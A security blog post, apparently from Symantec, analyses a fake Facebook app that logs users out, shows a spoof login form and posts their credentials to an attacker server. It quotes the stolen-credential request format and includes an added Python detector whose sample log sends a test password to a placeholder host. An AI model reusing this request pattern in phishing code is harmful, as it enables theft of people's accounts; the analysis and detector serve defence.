Source : Symantec.com

Another Fake Facebook App is Here to Steal your Passwords

Posted: 6 hours 13 min ago
By Hardik Shah

Recently, we came across an application that displays the message “Tornado Randomly Appears During Soccer Game” on Facebook.

Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is already logged in to Facebook, the malicious app logs the user out and asks them to log in again.

When the user clicks on the “Login” button, the script shows a login form.

When the user enters their login details and clicks on the Login button, the fake application sends two POST requests: one to Facebook.com, and the other to the malicious server. The request sent to the malicious server has the following format:

    http://IPRemoved/log.php?email=<email address>&pass=<password>

Standard advice is to check the address bar to see where a login form will send your data, but that isn’t enough in this case. The address bar shows apps.facebook.com while the login form is displayed, even though the credentials are also posted to a malicious site.
The following Fiddler logs show email addresses and passwords being posted to the malicious server:
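The capture itself is not reproduced here. As an added example (not code from the original post), the following Python check runs over constructed proxy-log lines of the shape METHOD REFERER_URL REQUEST_URL and flags any request that carries login fields to a host outside the site the user is looking at, which is exactly the signal the address bar hides in this case. The log format, the fakeapp path and the 203.0.113.7 address are all assumptions standing in for the removed attacker details.

```python
from urllib.parse import urlparse, parse_qs

# Field names a phishing kit's log.php typically receives (cf. email=/pass= above).
CREDENTIAL_PARAMS = {"email", "pass", "password", "passwd", "pwd", "user", "username", "login"}

def host_matches(host, trusted_suffixes):
    """True if host is a trusted domain or a subdomain of one (facebook.com.evil.test is not)."""
    host = (host or "").lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in trusted_suffixes)

def parse_log_line(line):
    """Constructed log shape for this example: METHOD REFERER_URL REQUEST_URL."""
    parts = line.split()
    return {"method": parts[0], "referer": parts[1], "url": parts[2]} if len(parts) == 3 else None

def find_credential_exfil(log_text, trusted_suffixes=("facebook.com",)):
    """Return requests that carry credential fields to a host outside the trusted domains."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_log_line(line)
        if entry is None:
            continue
        url = urlparse(entry["url"])
        params = {k.lower() for k in parse_qs(url.query, keep_blank_values=True)}
        cred_fields = sorted(params & CREDENTIAL_PARAMS)
        if not cred_fields:
            continue  # no login fields in the query string
        if host_matches(url.hostname, trusted_suffixes):
            continue  # credentials going to the site the user actually sees
        findings.append({
            "referer_host": urlparse(entry["referer"]).hostname,
            "dest_host": url.hostname,
            "path": url.path,
            "fields": cred_fields,  # field names only; never write the values to a report
        })
    return findings

# Constructed sample: login form shown under apps.facebook.com, credentials posted twice.
# 203.0.113.7 is a documentation-range placeholder for the removed attacker IP.
SAMPLE_LOG = """\
POST https://apps.facebook.com/fakeapp/ https://www.facebook.com/login.php
POST https://apps.facebook.com/fakeapp/ http://203.0.113.7/log.php?email=alice%40example.com&pass=hunter2
GET https://apps.facebook.com/fakeapp/ http://203.0.113.7/fb2.js
"""

if __name__ == "__main__":
    for f in find_credential_exfil(SAMPLE_LOG):
        print(f"off-origin credential post: {f['referer_host']} -> {f['dest_host']}{f['path']} fields={f['fields']}")
```

The legitimate POST to www.facebook.com is left alone; only the copy sent to the IP-hosted log.php is reported, and the report carries field names, never the captured values.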

The bogus app also “likes” the link in an automatic post, which will be displayed on the user’s profile:

We have also observed a similar attack hosted on the same IP address. It displays a different message, “Video: This is the best April Fools’ prank ever!”, and uses the same technique described above to steal usernames and passwords for users’ Facebook accounts.

The good news is that Symantec customers are protected from this attack. We at Symantec urge readers to install all security patches and definitions regularly.
